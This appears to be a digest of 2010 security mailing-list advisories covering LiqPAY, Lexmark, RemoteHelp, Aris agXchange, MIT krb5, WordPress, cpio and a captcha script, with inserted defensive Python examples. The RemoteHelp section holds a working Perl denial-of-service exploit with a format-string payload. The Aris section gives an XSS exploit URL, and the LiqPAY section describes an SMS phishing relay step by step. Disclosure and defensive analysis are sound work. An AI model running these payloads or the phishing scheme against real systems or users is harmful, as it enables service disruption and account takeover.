Insecure SMS authorization scheme at LiqPAY micro-payments of PrivatBank (Ukraine)

2010-03-23 Thread Andriy Tereshchenko
1) Affected Service

* LiqPAY micro-payment system from PrivatBank, Ukraine

2) Severity

Rating: Moderate (requires user action)
Impact: Exposure of sensitive financial information and unauthorized
access to system
Where:  Remote (man-in-the-middle)

3) Vendor's Description of Service

"LiqPAY is global open high-secure payment system that lets anyone
easily send money using mobile phones, Internet and payment cards
worldwide.
...
LiqPAY Benefits: Strong security. Strong identification and
verification using the OTP technology."

Product Link:
https://www.liqpay.com/?do=pages&p=productliqpay


4) Description of Vulnerability

LiqPAY one-time-password technology is based on SMS messages sent to
the mobile phone of a registered user. In order to log in, the user has
to submit his mobile phone number on a web form and is then prompted
for the 8-digit password from the SMS message sent by the system to
his mobile.

The vulnerability is that SMS messages are not tagged in any way to
show that they are from the LiqPAY system.
The SMS message text is like "Parol: 12345678 --Do not pass your password
to third party.".

Exploitation is as follows: an attacker can set up a website (or any
other service) that first asks users for their mobile phone number,
then for the password they have received. In fact, the attacker does
not send the SMS himself but requests that the LiqPAY system send one
to the user. After the user types the password he received in the SMS
message into the attacker's website, the attacker can use this password
to log in to the LiqPAY system.

After logging in to LiqPAY, all services of the system are available
to the attacker: the history of previous payments and sending of
digital money.

5) Solution

SMS messages from the LiqPAY system should be tagged properly in order
to allow users to clearly identify the service and website URL the SMS
originates from.

Temporary solution for current users: do not respond to any SMS
messages similar in format to LiqPAY's (where an 8-digit password is
used).

6) Time Table

18:16 EET 22 March 2010 - Issue reported in public to vendor
(Alexander Vityaz blog, Head of Center E-business at Privatbank)
18:22 - Vendor denial as non-issue

7) Credits

Discovered by client of PrivatBank.

8) About LiqPay and PrivatBank

The commercial bank PrivatBank (Ukraine) was founded in 1992. Its
services are used by more than 23% of the population of Ukraine.
PrivatBank currently serves 420 thousand corporate clients and small
businesses, and over 13 million individual accounts.

LiqPAY is a micropayment system invented by PrivatBank. It is actively
pushed to clients of PrivatBank.
All ~3000 branches of the bank issue micropayment vouchers or open
LiqPAY accounts instead of giving change in coins to most of their
clients when bank services or wire payments are requested. The number
of LiqPAY users as a result of this effort is claimed to be over 120
thousand.
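As an added illustration of the solution the post proposes (example code written here from the service side; it is not LiqPAY's code), the block below formats the SMS so that it names the service and the one site the code is valid for, and keeps the server-side record that limits what a relayed code is worth: expiry, single use, a small guess budget and a minimum interval between sends to the same number. The service name, host, lifetimes and limits are assumed values; only the 8-digit length comes from the post.

```python
import hmac
import secrets
import time

# Assumed values for this example; the post gives only the 8-digit length.
SERVICE_NAME = "LiqPAY"
SERVICE_HOST = "www.liqpay.com"   # host taken from the post's product link
OTP_DIGITS = 8
OTP_TTL_SECONDS = 120
MAX_VERIFY_ATTEMPTS = 3
MIN_RESEND_INTERVAL = 30


def format_sms(code: str) -> str:
    """SMS text that names the service and the only site the code is valid
    for, instead of the untagged "Parol: 12345678" message the post quotes."""
    return (f"{SERVICE_NAME}: your login code is {code}. Use it only at "
            f"https://{SERVICE_HOST}/ and never give it to anyone else.")


class OtpStore:
    """Server-side record of issued codes: expiry, guess budget, single use,
    and a minimum interval between SMS sends for the same number."""

    def __init__(self, now=time.time):
        self._now = now
        self._pending = {}     # phone -> [code, issued_at, attempts_left]

    def issue(self, phone: str):
        """Return (code, sms_text); the code goes only to the SMS gateway.
        Raises if a code was sent to this number too recently."""
        entry = self._pending.get(phone)
        if entry and self._now() - entry[1] < MIN_RESEND_INTERVAL:
            raise RuntimeError("resend too soon")
        code = "".join(secrets.choice("0123456789") for _ in range(OTP_DIGITS))
        # A new code replaces the old one, so triggering a second SMS
        # does not leave two valid codes outstanding.
        self._pending[phone] = [code, self._now(), MAX_VERIFY_ATTEMPTS]
        return code, format_sms(code)

    def verify(self, phone: str, submitted: str) -> bool:
        entry = self._pending.get(phone)
        if entry is None:
            return False
        code, issued_at, _attempts_left = entry
        if self._now() - issued_at > OTP_TTL_SECONDS:
            del self._pending[phone]          # expired
            return False
        if hmac.compare_digest(code.encode(), submitted.encode()):
            del self._pending[phone]          # single use
            return True
        entry[2] -= 1
        if entry[2] <= 0:
            del self._pending[phone]          # guess budget exhausted
        return False
```

The tag in the message is what lets a recipient notice that a code requested "by" some other site still arrived from LiqPAY; the store-side limits cap how long and how often a code obtained that way can be tried.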


{PRL} Lexmark Multiple Laser printer FTP Remote Denial of Services

2010-03-23 Thread Francis Provencher
#

Application:   Lexmark Multiple Laser Printer FTP Remote Denial of Services

Platforms:   Lexmark Multiple Laser printer

Exploitation:   Remote Exploitable

CVE Number:   CVE-2010-0618

Discover Date:   2010-01-06

Author:   Francis Provencher (Protek Research Lab's)

Website:   http://www.protekresearchlab.com


#

1) Introduction
2) Report Timeline
3) Technical details
4) Products affected
5) The Code

#

=
1) Introduction
=

Lexmark specializes in printers and printer accessories. Its current
range of products includes color and monochrome laser printers and
inkjet printers, both of which may include scanners (including
all-in-one devices with faxing and copying capabilities and photo
printers), and dot matrix printers. Lexmark was one of the first
companies to release wifi inkjet printers and the very first to
release printers with a web-enabled touchscreen, coming in early
September of 2009. They also offer a wide variety of laser printers
with software solutions for more professional printing environments.

(Wikipedia)

#


2) Report Timeline


2010-01-06  Vendor Contacted
2010-01-09  Vendor Response
2010-01-09  Vendor requests a PoC
2010-01-10  PoC is sent to the vendor
2010-01-12  Vendor confirms they received the PoC
2010-01-13  Vendor confirms the vulnerability
2010-03-22  Public release of this advisory

#

==
3) Technical details
==

Lexmark products have connection flood protection mechanisms that
limit the number of simultaneous network connections that can be made
to the device on most TCP service ports (21/FTP, 79/Finger, 515/LPD,
631/IPP, 5001, 9100-9104, 9200, 9300, 9400, 9500-9501 & 9600). The FTP
service exception handler does not properly maintain the state of the
flood protection when passive FTP connections are aborted. Once a
sufficient number of passive FTP connections have timed out (typically
15), the flood protection is enabled and is never reset. The flood
protection can be reset by resetting the network adapter, or by power
cycling the device.


#

=
4) Product affected
=

The list is too long; you can find the information on the Lexmark web site:

http://support.lexmark.com/alerts


#

=
5) The Code
=

No proof of concept code is required.

#
(PRL-2010-02)
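The state-tracking failure the advisory describes, modelled in added example code that is not Lexmark firmware: a limiter that returns a slot only on a clean exit, beside one that returns it on every exit path. The limit of 15 is the advisory's "typically 15"; the class and function names are this example's own.

```python
MAX_CONNECTIONS = 15   # the advisory: typically 15 aborted sessions suffice


class PassiveTransferAborted(Exception):
    """Stands in for a passive-mode data connection timing out or being reset."""


class LeakyLimiter:
    """Gives a slot back only on a clean return: an aborted session skips the
    decrement, so enough aborts leave the limit permanently engaged."""

    def __init__(self, limit: int = MAX_CONNECTIONS):
        self.limit = limit
        self.active = 0

    def handle(self, session) -> None:
        if self.active >= self.limit:
            raise ConnectionRefusedError("flood protection engaged")
        self.active += 1
        session()           # an exception here skips the line below
        self.active -= 1

    def reset(self) -> None:
        """The only recovery the advisory offers: adapter reset or power cycle."""
        self.active = 0


class SafeLimiter(LeakyLimiter):
    """Same policy, but the slot is released on every exit path."""

    def handle(self, session) -> None:
        if self.active >= self.limit:
            raise ConnectionRefusedError("flood protection engaged")
        self.active += 1
        try:
            session()
        finally:
            self.active -= 1


def admits_after_aborts(limiter, aborted_sessions: int) -> bool:
    """Run the given number of aborted sessions through the limiter, then
    report whether an ordinary session is still accepted."""
    def aborted():
        raise PassiveTransferAborted()

    for _ in range(aborted_sessions):
        try:
            limiter.handle(aborted)
        except (PassiveTransferAborted, ConnectionRefusedError):
            pass
    try:
        limiter.handle(lambda: None)
    except ConnectionRefusedError:
        return False
    return True
```

The observable symptom is the same as in the advisory: with the leaky variant the active count only ever climbs, and once it reaches the limit every new connection is refused until `reset()`; a monitor that watches the active count against the number of open sockets catches this class of leak before it becomes an outage.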


Re: Firefox 3.6 for Windows includes a forged CA cert

2010-03-23 Thread Marcus Meissner
On Fri, Mar 19, 2010 at 08:22:16PM +, Francis Litterio wrote:
> In Firefox 3.6 for Windows, go to Tools -> Options -> Advanced -> Encryption 
> ->
> View Certificates -> Authorities and scroll down to the entry for "Equifax
> Secure Inc." and you'll see a cert labeled "MD5 Collisions Inc
> (http://www.phreedom.org/md5)" grouped with the other Equifax certs.
> 
> Yes, it's expired, so it poses no real threat, but why is the Mozilla Project
> shipping Firefox with that cert?  It just causes FUD.

https://bugzilla.mozilla.org/show_bug.cgi?id=471715 is the associated mozilla 
bug.

Seems intentional.

Ciao, Marcus


[CORELAN-10-015] - Remote Help 0.0.7 Httpd DoS (Format String)

2010-03-23 Thread Security

|--|
| __   __  |
|   _    / /___ _ / /   _ ___  |
|  / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |
| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |
| \___/\/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |
|  |
|   http://www.corelan.be:8800 |
|  secur...@corelan.be |
|  |
|-[ EIP Hunters ]--|
|  |
| Vulnerability Disclosure Report  |
|  |
|--|

Advisory: CORELAN-10-015
Disclosure date : March 20, 2010
http://www.corelan.be:8800/index.php/forum/security-advisories/remote-help-httpd-denial-of-service/



0x00 : Vulnerability information


[*] Product : RemoteHelp
[*] Version : 0.0.7
[*] Vendor : http://hipernes.sdf-eu.org/
[*] URL : http://hipernes.sdf-eu.org/
[*] URL : 
http://www.softpedia.com/progDownload/Remote-Help-Download-144888.html 
[*] URL : http://sourceforge.net/projects/remotehelp 
[*] Platform : Windows XP
[*] Type of vulnerability : Format String 
[*] Risk rating : Low/Medium
[*] Issue fixed in version : Unknown
[*] Vulnerability discovered by : Rick2600
[*] Corelan Team : 
http://www.corelan.be:8800/index.php/security/corelan-team-members/


0x01 : Vendor description of software
-
From the vendor website:

RemoteHelp is a minimal http server that allows to view and control a remote pc
running a 32-bits version of Microsoft Windows. It is only one file without any
configuration file and now include webcam support, new interface and new
features...



0x02 : Vulnerability details

The discovered vulnerability allows an attacker to cause a denial of service in
the application by sending a malicious request containing format string
specifiers. Remote code execution may be possible.

EAX 41424344
ECX 00E7F818
EDX 
EBX 006E
ESP 00D3F2FC ASCII "0..."
EBP 00D3F550
ESI 0001
EDI 00D3FE27 ASCII "XDCBA>"
EIP 00414DFC httpd_0_.00414DFC



0x03 : Vendor communication
---
01 feb 2010 : Vendor contacted - no reply 
20 mar 2010 : Public disclosure


0x04 : Exploit/PoC
--
# Exploit Title : Remote Help 0.0.7 Remote DoS
# Date  : 20 Mar 2010
# Author: Rick2600 (ricks2600[at]gmail{dot}com)
# Bug found by  : Rick2600
# Software Link : 
http://www.softpedia.com/progDownload/Remote-Help-Download-144888.html
# Version   : 0.0.7
# OS: Windows
# Tested on : XP SP2 En
# Type of vuln  : DoS
# Greetz to : Corelan Security Team : 
http://www.corelan.be:8800/index.php/security/corelan-team-members/
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
#
#
# Code :
print "|--|\n";
print "| __   __   |\n";
print "|   _    / /___ _ / /   _ ___  |\n";
print "|  / ___/ __ \\/ ___/ _ \\/ / __ `/ __ \\   / __/ _ \\/ __ `/ __ `__ \\ |\n";
print "| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |\n";
print "| \\___/\\/_/   \\___/_/\\__,_/_/ /_/   \\__/\\___/\\__,_/_/ /_/ /_/  |\n";
print "|  |\n";
print "|   http://www.corelan.be:8800 |\n";
print "|  |\n";
print "|-[ EIP Hunters ]--|\n\n";
print "[+] DoS exploit for Remote Help 0.0.7 Http\n";

use IO::Socket;

if ($#ARGV != 0) {
print $#ARGV;
print "\n  usage: $0 \n";
exit(0);
}

print "[+] Connecting to server $ARGV[0] on port 80\n\n";

$remote = IO::Socket::INET->new( Proto => "tcp",
 PeerAddr  => $ARGV[0],
 PeerPort  => "http(80)",
);
unless ($remote) { die "Cannot connect to Remote Help daemon on $ARGV[0]\n" }
print "[+] Connected!\n";

#CONTROL EAX
$payload = "/index.html" . "%x" x 90 . "A" x 250 . "%x" x 186 . "%.99x" x 15 . "%.19x" . "%nX" . "DCBA";

print "[+] Sending Malicious Request\n";
print $remote "GET $payload HTTP/1.1\r\n";
close $remote;
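An added detection check, not part of the Corelan advisory or of the RemoteHelp code: it URL-decodes the request target and counts printf-style conversion specifiers, flagging `%n` outright and long runs of read specifiers, then runs over a few constructed request lines (one shaped like the PoC's request, one hiding `%n` behind `%25`). The threshold and the function names are this example's assumptions.

```python
import re
from urllib.parse import unquote

# printf-style conversions: %n writes memory; long runs of %x/%s read it.
_SPEC = re.compile(
    r"%[-+ #0]*\d*(?:\.\d+)?(?:hh|h|ll|l|L|q|j|z|t)?[diouxXeEfFgGaAcspn]")

# Constructed sample request lines (not captured traffic).
SAMPLE_REQUESTS = [
    "GET /index.html HTTP/1.1",
    "GET /files/report%202010.pdf HTTP/1.1",             # ordinary URL encoding
    "GET /index.html" + "%x" * 20 + "%.99x%n HTTP/1.1",  # shaped like the PoC
    "GET /index.html%25n HTTP/1.1",                      # %n hidden behind %25
    "GARBAGE",                                           # not a request line
]


def format_string_risk(request_line: str) -> dict:
    """Count conversion specifiers in the URL-decoded request target."""
    try:
        _method, target, _version = request_line.split(" ", 2)
    except ValueError:
        return {"malformed": True, "specifiers": 0, "writes": 0}
    decoded = unquote(target).replace("%%", "")  # %% is a literal percent sign
    specs = _SPEC.findall(decoded)
    return {
        "malformed": False,
        "specifiers": len(specs),
        "writes": sum(1 for s in specs if s.endswith("n")),
    }


def is_suspicious(request_line: str, max_specifiers: int = 3) -> bool:
    """Any %n, more than a few specifiers, or an unparsable line is flagged."""
    risk = format_string_risk(request_line)
    return (risk["malformed"] or risk["writes"] > 0
            or risk["specifiers"] > max_specifiers)


def flagged_requests(lines) -> list:
    """The subset of request lines a proxy or IDS rule would alert on."""
    return [line for line in lines if is_suspicious(line)]
```

Decoding before matching matters: the raw target of the fourth sample contains no `%n`, only `%25n`, which is exactly what the server's own decoder hands to the vulnerable format call. The fix on the server side is the usual one, passing request data as an argument (`printf("%s", path)`) and never as the format string.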










Aris AGX agXchange ESM Cross Site Scripting Vulnerability

2010-03-23 Thread lament
=

Yaniv Miron aka "Lament" Advisory March 12, 2010

Aris AGX agXchange ESM Cross Site Scripting Vulnerability

=

=

I. BACKGROUND

=

E2B safety submissions module.

When it comes to the electronic submission of safety data using the E2B format,
meeting the often complicated and complex requirements from different regulatory
agencies—EMEA, MHLW, FDA and other NCAs—can be a challenge that consumes
vast amounts of time, effort and resources.

http://www.arisglobal.com/products/agxchange_esm.php

=

II. DESCRIPTION

=

A malicious attacker may inject scripts into the agXchange ESM module in the
Aris AGX application.

=

III. ANALYSIS

=

Exploitation of this vulnerability results in the execution of arbitrary
code using a malicious link.

=

IV. EXPLOIT

=

http://www.example.com/[agx_application]/pages/ucquerydetails.jsp?QueryID=>%22%27>

=

V. DISCLOSURE TIMELINE

=

Jan 2009 Vulnerability found

Jan 2009 Vendor Notification

March 2010 Public Disclosure

=

VI. CREDIT

=

Yaniv Miron aka "Lament".

lam...@ilhack.org
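An added example, not Aris code: the reflected parameter is placed into an attribute, into element text and into a script block, first verbatim (the pattern the exploit URL relies on) and then with the encoding each context needs. The page fragment, the function names and the script variable are assumptions of this example; `QueryID` is the parameter name from the advisory.

```python
import html
import json


def js_string_literal(value: str) -> str:
    """JSON-encode for a <script> block and also encode the characters that
    could end the block or open a tag, which json.dumps leaves alone."""
    return (json.dumps(value)
            .replace("<", "\\u003c")
            .replace(">", "\\u003e")
            .replace("&", "\\u0026"))


def render_query_details_unsafe(query_id: str) -> str:
    """The pattern the advisory's URL exploits: the parameter copied verbatim."""
    return (f'<input name="QueryID" value="{query_id}">'
            f'<p>Query {query_id}</p>')


def render_query_details(query_id: str) -> str:
    """Attribute and text contexts get HTML escaping with quotes encoded;
    the value placed in a script block becomes a JS string literal."""
    safe = html.escape(query_id, quote=True)
    return (f'<input name="QueryID" value="{safe}">'
            f'<p>Query {safe}</p>'
            f'<script>var queryId = {js_string_literal(query_id)};</script>')
```

The advisory's `QueryID=>%22%27>` decodes to `>"'>`; in the unsafe rendering the `"` closes the `value` attribute early, which is the foothold the injected markup needs, while the escaped rendering keeps every character inside the attribute.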


MITKRB5-SA-2010-002 denial of service in SPNEGO [CVE-2010-0628 VU#839413]

2010-03-23 Thread Tom Yu
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

MITKRB5-SA-2010-002

MIT krb5 Security Advisory 2010-002
Original release: 2010-03-23
Last update: 2010-03-23

Topic: denial of service in SPNEGO

CVE-2010-0628
VU#839413
denial of service in SPNEGO

CVSSv2 Vector: AV:N/AC:L/Au:N/C:N/I:N/A:C/E:POC/RL:OF/RC:C

CVSSv2 Base Score:  7.8

Access Vector:  Network
Access Complexity:  Low
Authentication: None
Confidentiality Impact: None
Integrity Impact:   None
Availability Impact:Complete

CVSSv2 Temporal Score:  6.1

Exploitability: Proof-of-Concept
Remediation Level:  Official Fix
Report Confidence:  Confirmed

SUMMARY
=======

In MIT krb5 releases krb5-1.7 and later, the SPNEGO GSS-API mechanism
can experience an assertion failure when receiving certain invalid
messages. This can cause a GSS-API application to crash.

This is an implementation vulnerability in MIT krb5, and not a
vulnerability in the Kerberos protocol.

IMPACT
======

An unauthenticated remote attacker could cause a GSS-API application,
including the Kerberos administration daemon (kadmind) to crash.

AFFECTED SOFTWARE
=================

* kadmind in MIT releases krb5-1.7 and later

* FTP daemon in MIT releases krb5-1.7 and later

* Third-party software using the GSS-API library from MIT krb5
  releases krb5-1.7 and later

* MIT releases prior to krb5-1.7 did not contain the vulnerable code.

FIXES
=====

* The upcoming krb5-1.7.2 and krb5-1.8.1 releases will contain fixes
  for this vulnerability.

* Apply the patch available at

  http://web.mit.edu/kerberos/advisories/2010-002-patch.txt

  A PGP-signed patch is available at

  http://web.mit.edu/kerberos/advisories/2010-002-patch.txt.asc

REFERENCES
==========

This announcement is posted at:

  http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2010-002.txt

This announcement and related security advisories may be found on the
MIT Kerberos security advisory page at:

http://web.mit.edu/kerberos/advisories/index.html

The main MIT Kerberos web page is at:

http://web.mit.edu/kerberos/index.html

CVSSv2:

http://www.first.org/cvss/cvss-guide.html
http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2

CVE: CVE-2010-0628
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0628

CERT: VU#839413
http://www.kb.cert.org/vuls/id/839413

ACKNOWLEDGMENTS
===============

Thanks to Nalin Dahyabhai, Jan iankko Lieskovsky, and Zbysek Mraz (all
from Red Hat) for discovering and reporting this vulnerability.

CONTACT
=======

The MIT Kerberos Team security contact address is
.  When sending sensitive information,
please PGP-encrypt it using the following key:

pub   2048R/8B8DF501 2010-01-15 [expires: 2011-02-01]
uid MIT Kerberos Team Security Contact 

DETAILS
=======

A patch to fix CVE-2009-0845 interacted poorly with new functionality
introduced in krb5-1.7.  This allowed an error condition to occur
where receiving an invalid packet could cause an assertion failure,
crashing the program and causing denial of service.

When the spnego_gss_accept_sec_context() function (in
src/lib/gssapi/spnego/spnego_mech.c) receives an invalid packet during
the beginning of a GSS-API protocol exchange, it can set some internal
state that tells it to send an error token without first creating a
context handle, but some subsequently executed code contains a call to
assert() that requires that the context handle be non-null.

REVISION HISTORY
================

2010-03-23  original release

Copyright (C) 2010 Massachusetts Institute of Technology
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.8 (SunOS)

iEYEARECAAYFAkupAZsACgkQSO8fWy4vZo4ETACgn9xRUl3CTCiRd2vF1PBOaQ8b
EfUAoPz32NUU/mk+H8kej8fWQFo3iwcZ
=LHMP
-END PGP SIGNATURE-


Vulnerabilities in WordPress

2010-03-23 Thread MustLive

Hello Bugtraq!

I want to warn you about vulnerabilities in WordPress.

-
Advisory: Vulnerabilities in WordPress
-
URL: http://websecurity.com.ua/4016/
-
Timeline:

02.03.2010 - found the vulnerabilities.
02.03.2010 - didn't inform developers. After I informed WP developers
about multiple vulnerabilities in WordPress in December 2007 and they
ignored them - some they didn't fix and some they fixed quietly, without
thanking me or referencing me (they didn't even mention those fixed holes
in the release notes on the official site) - starting from 2008 I no
longer inform them about vulnerabilities in WordPress. Those holes were
posted to Bugtraq
(http://www.securityfocus.com/archive/1/archive/1/485786/100/0/threaded).
09.03.2010 - disclosed at my site.
-
Details:

These are Brute Force and Insufficient Authorization vulnerabilities.

Earlier, in 2008, I already wrote about a Brute Force vulnerability in
WordPress (http://websecurity.com.ua/2007/), which had been found by Kad
already in 2007 (http://securityvulns.ru/Pdocument580.html). And as I found
on 02.03.2010, in WordPress 2.9.2 this vulnerability still wasn't fixed. I
also found new vulnerabilities in WP.

Brute Force:

There is no protection against password guessing (Brute Force attacks) in
the function for protecting pages/posts with a password.

Insufficient Authorization:

For every page/post in WP it's possible to set a password, and these
passwords can be equal. But the password-access function writes a global
cookie, which works for the whole site. And so, after entering the password
once for one page/post, it's possible to see all protected pages/posts (with
the same password, even without knowing that the password matches), because
on a request to them access will be granted automatically.

WordPress 2.9.2 and previous versions (all 2.x versions) are vulnerable. I
tested in different versions of WP, particularly 2.0.11 and 2.9.2.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
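Added example code, not WordPress's own implementation: it contrasts a site-wide cookie derived only from the password (the behaviour MustLive describes) with a cookie keyed to the post id under a server secret, and adds a per-client guess budget against the Brute Force issue. The class and function names, the secret and the limit are this example's assumptions; passwords are kept in plain text here only to keep the example short.

```python
import hashlib
import hmac
import secrets


# --- the pattern described in the post: one cookie derived from the password ---
def legacy_cookie(password: str) -> str:
    """Same value for every post that uses this password."""
    return hashlib.sha256(password.encode()).hexdigest()


def legacy_may_view(post_password: str, cookie: str) -> bool:
    # Any post whose password matches the cookie opens, regardless of which
    # post the visitor actually entered the password for.
    return cookie == legacy_cookie(post_password)


# --- per-post, keyed token with a guess budget ---
class PostPasswordGate:
    def __init__(self, secret: bytes = None, max_guesses: int = 5):
        self._secret = secret or secrets.token_bytes(32)   # assumed per-site key
        self._max_guesses = max_guesses
        self._passwords = {}   # post_id -> password (a salted hash in practice)
        self._failures = {}    # (post_id, client) -> failed attempts

    def set_password(self, post_id: int, password: str) -> None:
        self._passwords[post_id] = password

    def _token(self, post_id: int, password: str) -> str:
        # Binding the post id into the MAC makes the cookie useless for any
        # other post, even one protected by an identical password.
        msg = f"{post_id}:{password}".encode()
        return hmac.new(self._secret, msg, hashlib.sha256).hexdigest()

    def submit_password(self, post_id: int, client: str, password: str):
        """Cookie value on success; None on a wrong guess or once the client
        has used up its guesses for this post."""
        key = (post_id, client)
        if self._failures.get(key, 0) >= self._max_guesses:
            return None
        expected = self._passwords.get(post_id)
        if expected is not None and hmac.compare_digest(
                expected.encode(), password.encode()):
            self._failures.pop(key, None)
            return self._token(post_id, password)
        self._failures[key] = self._failures.get(key, 0) + 1
        return None

    def may_view(self, post_id: int, cookie) -> bool:
        password = self._passwords.get(post_id)
        if password is None:
            return True                     # unprotected post
        if cookie is None:
            return False
        return hmac.compare_digest(self._token(post_id, password), cookie)
```

With the keyed token the visitor still gets a cookie and still need not retype the password for that post, but the cookie says nothing about any other post; the guess budget is keyed per post and per client so that one guesser cannot lock out other readers.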



[ MDVSA-2010:065 ] cpio

2010-03-23 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2010:065
 http://www.mandriva.com/security/
 ___

 Package : cpio
 Date: March 23, 2010
 Affected: 2008.0, 2009.0, 2009.1, 2010.0, Corporate 4.0,
   Enterprise Server 5.0, Multi Network Firewall 2.0
 ___

 Problem Description:

 A vulnerability has been found and corrected in cpio and tar:
 
 Heap-based buffer overflow in the rmt_read__ function in lib/rtapelib.c
 in the rmt client functionality in GNU tar before 1.23 and GNU cpio
 before 2.11 allows remote rmt servers to cause a denial of service
 (memory corruption) or possibly execute arbitrary code by sending more
 data than was requested, related to archive filenames that contain a :
 (colon) character (CVE-2010-0624).
 
 The Tar package as shipped with Mandriva Linux is not affected
 by this vulnerability, but it was patched nonetheless in order to
 provide additional security to customers who recompile the package
 while having the rsh package installed.
 
 Packages for 2008.0 are provided for Corporate Desktop 2008.0
 customers.
 
 The updated packages have been patched to correct this issue.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0624
 ___

 Updated Packages:

 Mandriva Linux 2008.0:
 56cdfb4e12affc6594049570fb8d35ce  2008.0/i586/cpio-2.9-2.2mdv2008.0.i586.rpm
 705c2df54a9920908909423da574b32d  2008.0/i586/tar-1.18-1.2mdv2008.0.i586.rpm 
 596789a93702aecd07562281c9d48f78  2008.0/SRPMS/cpio-2.9-2.2mdv2008.0.src.rpm
 b1a645b471280fa0e51c38aedfa504aa  2008.0/SRPMS/tar-1.18-1.2mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 d7eaf79ca34d67b5f152372813254cb1  
2008.0/x86_64/cpio-2.9-2.2mdv2008.0.x86_64.rpm
 2c97f01252660e80b9d00b7ebd7815e5  
2008.0/x86_64/tar-1.18-1.2mdv2008.0.x86_64.rpm 
 596789a93702aecd07562281c9d48f78  2008.0/SRPMS/cpio-2.9-2.2mdv2008.0.src.rpm
 b1a645b471280fa0e51c38aedfa504aa  2008.0/SRPMS/tar-1.18-1.2mdv2008.0.src.rpm

 Mandriva Linux 2009.0:
 a3058108cddda8dde95b20b9be7d2aae  2009.0/i586/cpio-2.9-5.1mdv2009.0.i586.rpm
 8af041a2f14d3ea6761eb1ec77fa4964  2009.0/i586/tar-1.20-7.1mdv2009.0.i586.rpm 
 93f6cecaa13c9b3495721592305e1339  2009.0/SRPMS/cpio-2.9-5.1mdv2009.0.src.rpm
 a755272047ac5cb179a5c294057154cd  2009.0/SRPMS/tar-1.20-7.1mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 ab93a4d266e37076e233aa2367a8c478  
2009.0/x86_64/cpio-2.9-5.1mdv2009.0.x86_64.rpm
 67ed3f23bcc8a8b633cbd8c8d7b9516b  
2009.0/x86_64/tar-1.20-7.1mdv2009.0.x86_64.rpm 
 93f6cecaa13c9b3495721592305e1339  2009.0/SRPMS/cpio-2.9-5.1mdv2009.0.src.rpm
 a755272047ac5cb179a5c294057154cd  2009.0/SRPMS/tar-1.20-7.1mdv2009.0.src.rpm

 Mandriva Linux 2009.1:
 2d0eeca73eb44a8c7e41c50fd4c20add  2009.1/i586/cpio-2.9-6.1mdv2009.1.i586.rpm
 3cff4bb92b1ca2e074e1382f555bf7bc  2009.1/i586/tar-1.21-2.1mdv2009.1.i586.rpm 
 b5be5792c0e7e74eae6c373a40dd  2009.1/SRPMS/cpio-2.9-6.1mdv2009.1.src.rpm
 a5ed5628ea098b1687cd432aff6adb38  2009.1/SRPMS/tar-1.21-2.1mdv2009.1.src.rpm

 Mandriva Linux 2009.1/X86_64:
 d15356d257890237b4176c3206f03b4d  
2009.1/x86_64/cpio-2.9-6.1mdv2009.1.x86_64.rpm
 edd4211deb588b7b649606e8585bd15a  
2009.1/x86_64/tar-1.21-2.1mdv2009.1.x86_64.rpm 
 b5be5792c0e7e74eae6c373a40dd  2009.1/SRPMS/cpio-2.9-6.1mdv2009.1.src.rpm
 a5ed5628ea098b1687cd432aff6adb38  2009.1/SRPMS/tar-1.21-2.1mdv2009.1.src.rpm

 Mandriva Linux 2010.0:
 bbe43728f9f8db2ceabba5dcb375e4a7  2010.0/i586/cpio-2.10-1.1mdv2010.0.i586.rpm
 d5f150a07bf5fb6e6918b49f80742031  2010.0/i586/tar-1.22-2.1mdv2010.0.i586.rpm 
 f3379cc3d9787bda215d08dd56d33e3c  2010.0/SRPMS/cpio-2.10-1.1mdv2010.0.src.rpm
 d6f6ed62e6c1cc2bf1761408427ff0a1  2010.0/SRPMS/tar-1.22-2.1mdv2010.0.src.rpm

 Mandriva Linux 2010.0/X86_64:
 9bbaba5025e46793b44503684fe963a3  
2010.0/x86_64/cpio-2.10-1.1mdv2010.0.x86_64.rpm
 965f38e0f6d386e02d6a174f84871dd9  
2010.0/x86_64/tar-1.22-2.1mdv2010.0.x86_64.rpm 
 f3379cc3d9787bda215d08dd56d33e3c  2010.0/SRPMS/cpio-2.10-1.1mdv2010.0.src.rpm
 d6f6ed62e6c1cc2bf1761408427ff0a1  2010.0/SRPMS/tar-1.22-2.1mdv2010.0.src.rpm

 Corporate 4.0:
 f614d9c66ae80c195bff9126e1755284  
corporate/4.0/i586/cpio-2.6-5.2.20060mlcs4.i586.rpm
 2ab8ec94b6e698122a2965bc942f4507  
corporate/4.0/i586/tar-1.15.1-5.5.20060mlcs4.i586.rpm 
 3ea902eef3045f53fc5731cd7d2ae9bd  
corporate/4.0/SRPMS/cpio-2.6-5.2.20060mlcs4.src.rpm
 c4eb72165f7f6e82b8fa1e61f03ae8d8  
corporate/4.0/SRPMS/tar-1.15.1-5.5.20060mlcs4.src.rpm

 Corporate 4.0/X86_64:
 459a97a9a72f94a331f71a3ab7364d73  
corporate/4.0/x86_64/cpio-2.6-5.2.20060mlcs4.x86_64.rpm
 f6f389f792d26da8599ca3f52337bfda  
corporate/4.0/x86_64/tar-1.15.1-5.5.20060mlcs4.x86_64.

Vulnerabilities in CaptchaSecurityImages

2010-03-23 Thread MustLive

Hello Bugtraq!

I want to warn you about security vulnerabilities in CaptchaSecurityImages.
It's a captcha script which is used at many web sites and engines.

-
Advisory: Vulnerabilities in CaptchaSecurityImages
-
URL: http://websecurity.com.ua/4043/
-
Timeline:
06.10.2007 - found the Insufficient Anti-automation vulnerability while
conducting my project Month of Bugs in Captchas
(http://websecurity.com.ua/category/mobic/).
17.09.2009 - found Denial of Service vulnerability.
17.03.2010 - disclosed at my site.
